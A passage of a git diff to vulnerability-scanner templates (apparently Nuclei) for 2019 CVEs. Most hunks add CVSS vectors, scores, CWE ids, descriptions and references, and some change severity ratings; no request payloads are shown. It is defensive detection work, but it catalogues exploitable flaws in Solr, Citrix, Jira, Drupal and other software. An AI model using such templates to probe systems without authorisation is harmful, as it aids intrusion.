CVE-2019-17558 info: name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template author: pikpikcu,madrobot - severity: critical + severity: high reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 tags: cve,cve2019,apache,rce,solr,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.50 + cve-id: CVE-2019-17558 + cwe-id: CWE-74 + description: "Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/` directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled` by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user)." requests: - raw: diff --git a/cves/2019/CVE-2019-18393.yaml b/cves/2019/CVE-2019-18393.yaml index 6f9a81ac5d..ca54457a31 100644 --- a/cves/2019/CVE-2019-18393.yaml +++ b/cves/2019/CVE-2019-18393.yaml @@ -2,10 +2,15 @@ id: CVE-2019-18393 info: name: Openfire LFI author: pikpikcu - severity: high + severity: medium description: PluginServlet.java in Ignite Realtime Openfire through 4.4.2 does not ensure that retrieved files are located under the Openfire home directory, aka a directory traversal vulnerability. reference: https://swarm.ptsecurity.com/openfire-admin-console/ tags: cve,cve2019,openfire,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-18393 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-18394.yaml b/cves/2019/CVE-2019-18394.yaml index 389cc72ec4..3c50ca751a 100644 --- a/cves/2019/CVE-2019-18394.yaml +++ b/cves/2019/CVE-2019-18394.yaml @@ -9,6 +9,11 @@ info: - https://swarm.ptsecurity.com/openfire-admin-console/ - https://github.com/igniterealtime/Openfire/pull/1497 tags: cve,cve2019,ssrf,openfire,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-18394 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index bd28bef61f..01d00b9999 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 severity: critical tags: cve,cve2019,strapi,auth-bypass,intrusive + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-18818 + cwe-id: CWE-640 requests: - raw: diff --git a/cves/2019/CVE-2019-19134.yaml b/cves/2019/CVE-2019-19134.yaml index 89c923f6b0..5a3e696f04 100644 --- a/cves/2019/CVE-2019-19134.yaml +++ b/cves/2019/CVE-2019-19134.yaml @@ -7,6 +7,11 @@ info: description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-19134 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-19368.yaml b/cves/2019/CVE-2019-19368.yaml index a0715365dc..0105b0b817 100644 --- a/cves/2019/CVE-2019-19368.yaml +++ b/cves/2019/CVE-2019-19368.yaml @@ -7,6 +7,11 @@ info: description: A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and can execute arbitrary Javascripts reference: https://github.com/harshit-shukla/CVE-2019-19368/ tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-19368 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-19781.yaml b/cves/2019/CVE-2019-19781.yaml index 9557399b76..318fc4fb2c 100644 --- a/cves/2019/CVE-2019-19781.yaml +++ b/cves/2019/CVE-2019-19781.yaml @@ -3,10 +3,15 @@ id: CVE-2019-19781 info: name: Citrix ADC Directory Traversal author: organiccrap - severity: high + severity: critical description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. reference: https://support.citrix.com/article/CTX267027 tags: cve,cve2019,citrix,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-19781 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-19908.yaml b/cves/2019/CVE-2019-19908.yaml index 3be30f419e..8f9a04ea11 100644 --- a/cves/2019/CVE-2019-19908.yaml +++ b/cves/2019/CVE-2019-19908.yaml @@ -7,6 +7,11 @@ info: description: phpMyChat-Plus 1.98 is vulnerable to reflected XSS via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable. reference: https://cinzinga.github.io/CVE-2019-19908/ tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-19908 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-19985.yaml b/cves/2019/CVE-2019-19985.yaml index 6d1138f5ce..da9611d488 100644 --- a/cves/2019/CVE-2019-19985.yaml +++ b/cves/2019/CVE-2019-19985.yaml @@ -7,6 +7,11 @@ info: description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure. reference: https://www.exploit-db.com/exploits/48698 tags: cve,cve2019,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-19985 + cwe-id: CWE-862 requests: - method: GET diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml index 58a3857874..605d0be619 100644 --- a/cves/2019/CVE-2019-20085.yaml +++ b/cves/2019/CVE-2019-20085.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 - https://www.exploit-db.com/exploits/48311 tags: cve,cve2019,iot,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-20085 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-20141.yaml b/cves/2019/CVE-2019-20141.yaml index e94d8eb197..43d20edb98 100644 --- a/cves/2019/CVE-2019-20141.yaml +++ b/cves/2019/CVE-2019-20141.yaml @@ -7,6 +7,11 @@ info: description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter. reference: https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-20141 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-2588.yaml b/cves/2019/CVE-2019-2588.yaml index cdc771e4c6..92c2d58019 100644 --- a/cves/2019/CVE-2019-2588.yaml +++ b/cves/2019/CVE-2019-2588.yaml @@ -3,11 +3,15 @@ id: CVE-2019-2588 info: name: Oracle Business Intelligence Path Traversal author: madrobot - severity: high + severity: medium tags: cve,cve2019,oracle,lfi reference: http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html description: | Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security) + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.90 + cve-id: CVE-2019-2588 requests: - method: GET diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml index 1d87fb5936..e8c42482e2 100644 --- a/cves/2019/CVE-2019-2616.yaml +++ b/cves/2019/CVE-2019-2616.yaml @@ -9,6 +9,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - https://www.exploit-db.com/exploits/46729 tags: cve,cve2019,oracle,xxe,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.20 + cve-id: CVE-2019-2616 requests: - raw: diff --git a/cves/2019/CVE-2019-2725.yaml b/cves/2019/CVE-2019-2725.yaml index 21ee150f0e..7fbac5b4c5 100644 --- a/cves/2019/CVE-2019-2725.yaml +++ b/cves/2019/CVE-2019-2725.yaml @@ -11,6 +11,11 @@ info: - https://paper.seebug.org/910/ - https://www.exploit-db.com/exploits/46780/ - https://www.oracle.com/security-alerts/cpujan2020.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-2725 + cwe-id: CWE-74 requests: - method: POST diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml index 3478b09508..48d47fda95 100644 --- a/cves/2019/CVE-2019-2767.yaml +++ b/cves/2019/CVE-2019-2767.yaml @@ -9,6 +9,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://www.exploit-db.com/exploits/46729 tags: cve,cve2019,oracle,xxe,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.20 + cve-id: CVE-2019-2767 requests: - raw: diff --git a/cves/2019/CVE-2019-3396.yaml b/cves/2019/CVE-2019-3396.yaml index dd385d5b7f..9a4ba766ef 100644 --- a/cves/2019/CVE-2019-3396.yaml +++ b/cves/2019/CVE-2019-3396.yaml @@ -2,10 +2,15 @@ id: CVE-2019-3396 info: author: harshbothra_ name: Atlassian Confluence Path Traversal - severity: high + severity: critical description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection. reference: https://github.com/x-f1v3/CVE-2019-3396 tags: cve,cve2019,atlassian,confluence,lfi,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-3396 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2019/CVE-2019-3401.yaml b/cves/2019/CVE-2019-3401.yaml index 9c2a7c4819..9696be56d8 100644 --- a/cves/2019/CVE-2019-3401.yaml +++ b/cves/2019/CVE-2019-3401.yaml @@ -4,9 +4,14 @@ info: name: Atlassian JIRA Information Exposure (CVE-2019-3401) author: TechbrunchFR,milo2012 description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. - severity: info + severity: medium tags: cve,cve2019,jira,atlassian reference: https://jira.atlassian.com/browse/JRASERVER-69244 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-3401 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2019/CVE-2019-3402.yaml b/cves/2019/CVE-2019-3402.yaml index 9ca60822a2..ce14735982 100644 --- a/cves/2019/CVE-2019-3402.yaml +++ b/cves/2019/CVE-2019-3402.yaml @@ -7,6 +7,11 @@ info: description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter. reference: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c tags: cve,cve2019,atlassian,jira,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-3402 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-3403.yaml b/cves/2019/CVE-2019-3403.yaml index e554d89a9c..ebf4a42eea 100644 --- a/cves/2019/CVE-2019-3403.yaml +++ b/cves/2019/CVE-2019-3403.yaml @@ -7,6 +7,11 @@ info: description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. reference: https://jira.atlassian.com/browse/JRASERVER-69242 tags: cve,cve2019,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-3403 + cwe-id: CWE-863 requests: - method: GET diff --git a/cves/2019/CVE-2019-3799.yaml b/cves/2019/CVE-2019-3799.yaml index 8c8346a9e8..f4c662a765 100644 --- a/cves/2019/CVE-2019-3799.yaml +++ b/cves/2019/CVE-2019-3799.yaml @@ -2,12 +2,17 @@ id: CVE-2019-3799 info: name: Spring-Cloud-Config-Server Directory Traversal author: madrobot - severity: high + severity: medium description: Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. reference: - https://github.com/mpgn/CVE-2019-3799 - https://pivotal.io/security/cve-2019-3799 tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2019-3799 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-5127.yaml b/cves/2019/CVE-2019-5127.yaml index d283867419..07c1505179 100644 --- a/cves/2019/CVE-2019-5127.yaml +++ b/cves/2019/CVE-2019-5127.yaml @@ -7,6 +7,11 @@ info: description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917 tags: cve,cve2019,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-5127 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2019/CVE-2019-5418.yaml b/cves/2019/CVE-2019-5418.yaml index b6a5302242..51c1e78b62 100644 --- a/cves/2019/CVE-2019-5418.yaml +++ b/cves/2019/CVE-2019-5418.yaml @@ -3,12 +3,16 @@ id: CVE-2019-5418 info: name: File Content Disclosure on Rails author: omarkurt - severity: medium + severity: high description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. reference: - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ tags: cve,cve2019,rails,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-5418 requests: - method: GET diff --git a/cves/2019/CVE-2019-6112.yaml b/cves/2019/CVE-2019-6112.yaml index d8c76b9925..5b12bbdb90 100644 --- a/cves/2019/CVE-2019-6112.yaml +++ b/cves/2019/CVE-2019-6112.yaml @@ -7,6 +7,11 @@ info: description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field). reference: https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b tags: cve,cve2019,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-6112 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-6340.yaml b/cves/2019/CVE-2019-6340.yaml index 515df72aee..d2b3c1a887 100644 --- a/cves/2019/CVE-2019-6340.yaml +++ b/cves/2019/CVE-2019-6340.yaml @@ -3,10 +3,15 @@ id: CVE-2019-6340 info: name: Drupal 8 core RESTful Web Services RCE author: madrobot - severity: critical + severity: high description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-6340 tags: cve,cve2019,drupal,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2019-6340 + cwe-id: CWE-502 requests: - method: POST diff --git a/cves/2019/CVE-2019-6715.yaml b/cves/2019/CVE-2019-6715.yaml index e004b0f931..16bbedcfc0 100644 --- a/cves/2019/CVE-2019-6715.yaml +++ b/cves/2019/CVE-2019-6715.yaml @@ -6,6 +6,13 @@ info: severity: high description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF tags: cve,cve2019,wordpress,wp-plugin,ssrf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-6715 + reference: + - https://vinhjaxt.github.io/2019/03/cve-2019-6715 + - http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html requests: - raw: diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml index f97c0dc144..076926d4d7 100644 --- a/cves/2019/CVE-2019-7219.yaml +++ b/cves/2019/CVE-2019-7219.yaml @@ -3,13 +3,18 @@ id: CVE-2019-7219 info: name: Zarafa WebApp Reflected XSS author: pdteam - severity: low + severity: medium description: | Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead. reference: - https://github.com/verifysecurity/CVE-2019-7219 - https://stash.kopano.io/repos?visibility=public tags: cve,cve2019,zarafa,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-7219 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-7238.yaml b/cves/2019/CVE-2019-7238.yaml index b989d29259..e6d8c9427e 100644 --- a/cves/2019/CVE-2019-7238.yaml +++ b/cves/2019/CVE-2019-7238.yaml @@ -8,6 +8,11 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 - https://github.com/jas502n/CVE-2019-7238 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-7238 + description: "Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control." requests: - raw: diff --git a/cves/2019/CVE-2019-7254.yaml b/cves/2019/CVE-2019-7254.yaml index 1cf467a83d..8e6ffca73b 100644 --- a/cves/2019/CVE-2019-7254.yaml +++ b/cves/2019/CVE-2019-7254.yaml @@ -6,6 +6,12 @@ info: severity: high reference: https://www.exploit-db.com/exploits/47616 tags: emerge,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2019-7254 + cwe-id: CWE-22 + description: "Linear eMerge E3-Series devices allow File Inclusion." requests: - method: GET diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml index a236e9b923..225bf2bb83 100644 --- a/cves/2019/CVE-2019-7256.yaml +++ b/cves/2019/CVE-2019-7256.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/47619 - http://linear-solutions.com/nsc_family/e3-series/ # vendor homepage tags: cve,cve2019,emerge,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2019-7256 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2019/CVE-2019-7275.yaml b/cves/2019/CVE-2019-7275.yaml index 1945fe217d..c50714bebc 100644 --- a/cves/2019/CVE-2019-7275.yaml +++ b/cves/2019/CVE-2019-7275.yaml @@ -3,12 +3,18 @@ id: CVE-2019-7275 info: name: Open Redirect in Optergy Proton/Enterprise BMS author: 0x_Akoko - severity: low + severity: medium reference: - https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html - https://applied-risk.com/resources/ar-2019-008 - https://cxsecurity.com/issue/WLB-2019110074 tags: cve,cve2019,redirect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-7275 + cwe-id: CWE-601 + description: "Optergy Proton/Enterprise devices allow Open Redirect." requests: - method: GET diff --git a/cves/2019/CVE-2019-7481.yaml b/cves/2019/CVE-2019-7481.yaml index 3f22173a79..7d6021e2bb 100644 --- a/cves/2019/CVE-2019-7481.yaml +++ b/cves/2019/CVE-2019-7481.yaml @@ -9,6 +9,11 @@ info: reference: - https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/ tags: cve,cve2019,sonicwall,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-7481 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2019/CVE-2019-7609.yaml b/cves/2019/CVE-2019-7609.yaml index 97c3a627c3..8621f4e5a1 100644 --- a/cves/2019/CVE-2019-7609.yaml +++ b/cves/2019/CVE-2019-7609.yaml @@ -9,6 +9,11 @@ info: - https://github.com/mpgn/CVE-2019-7609 - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 tags: cve,cve2019,kibana,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2019-7609 + cwe-id: CWE-94 requests: - method: POST diff --git a/cves/2019/CVE-2019-8442.yaml b/cves/2019/CVE-2019-8442.yaml index 74622a2fa8..6effba17ec 100644 --- a/cves/2019/CVE-2019-8442.yaml +++ b/cves/2019/CVE-2019-8442.yaml @@ -2,10 +2,14 @@ id: CVE-2019-8442 info: name: JIRA Directory Traversal author: Kishore Krishna (siLLyDaddy) - severity: medium + severity: high description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check. reference: https://jira.atlassian.com/browse/JRASERVER-69241 tags: cve,cve2019,atlassian,jira,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-8442 requests: - method: GET diff --git a/cves/2019/CVE-2019-8446.yaml b/cves/2019/CVE-2019-8446.yaml index 1dd04da7ee..99959daaf4 100644 --- a/cves/2019/CVE-2019-8446.yaml +++ b/cves/2019/CVE-2019-8446.yaml @@ -6,6 +6,14 @@ info: author: dhiyaneshDk severity: medium tags: cve,cve2019,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-8446 + cwe-id: CWE-863 + reference: + - https://jira.atlassian.com/browse/JRASERVER-69777 + - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839 requests: - raw: diff --git a/cves/2019/CVE-2019-8449.yaml b/cves/2019/CVE-2019-8449.yaml index 9552542758..8467b0fa56 100644 --- a/cves/2019/CVE-2019-8449.yaml +++ b/cves/2019/CVE-2019-8449.yaml @@ -9,6 +9,11 @@ info: - https://www.doyler.net/security-not-included/more-jira-enumeration - https://jira.atlassian.com/browse/JRASERVER-69796 tags: cve,cve2019,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-8449 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index c13e0e6df5..7fe324b099 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -10,6 +10,11 @@ info: - https://jira.atlassian.com/browse/JRASERVER-69793 - https://hackerone.com/reports/713900 tags: cve,cve2019,atlassian,jira,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.50 + cve-id: CVE-2019-8451 + cwe-id: CWE-918 requests: - method: POST diff --git a/cves/2019/CVE-2019-8903.yaml b/cves/2019/CVE-2019-8903.yaml index 38120db1ea..c8648e91fe 100644 --- a/cves/2019/CVE-2019-8903.yaml +++ b/cves/2019/CVE-2019-8903.yaml @@ -10,6 +10,11 @@ info: - https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7 - https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b tags: cve,cve2019,totaljs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-8903 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml index 778a2e1312..3a09c5cd0b 100644 --- a/cves/2019/CVE-2019-8937.yaml +++ b/cves/2019/CVE-2019-8937.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://www.exploit-db.com/exploits/46429 tags: cve,cve2019,xss,hoteldruid + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-8937 + cwe-id: CWE-79 + description: "HotelDruid 2.3.0 has XSS affecting the nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php." requests: - method: GET diff --git a/cves/2019/CVE-2019-8982.yaml b/cves/2019/CVE-2019-8982.yaml index 8af7a5e681..63269422cc 100644 --- a/cves/2019/CVE-2019-8982.yaml +++ b/cves/2019/CVE-2019-8982.yaml @@ -2,10 +2,15 @@ id: CVE-2019-8982 info: name: Wavemaker Studio 6.6 LFI/SSRF author: madrobot - severity: high + severity: critical description: com/wavemaker/studio/StudioService.java in WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value, leading to disclosure of local files and SSRF. reference: https://www.exploit-db.com/exploits/45158 tags: cve,cve2019,wavemaker,lfi,ssrf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.60 + cve-id: CVE-2019-8982 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2019/CVE-2019-9041.yaml b/cves/2019/CVE-2019-9041.yaml index 77491477a4..05c0ba21cc 100644 --- a/cves/2019/CVE-2019-9041.yaml +++ b/cves/2019/CVE-2019-9041.yaml @@ -9,6 +9,11 @@ info: - http://www.iwantacve.cn/index.php/archives/118/ - https://www.exploit-db.com/exploits/46454/ tags: cve,cve2019,zzzcms,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2019-9041 + cwe-id: CWE-917 requests: - method: POST diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index 3c31a10ae9..58167af430 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -3,7 +3,7 @@ id: CVE-2019-9618 info: name: 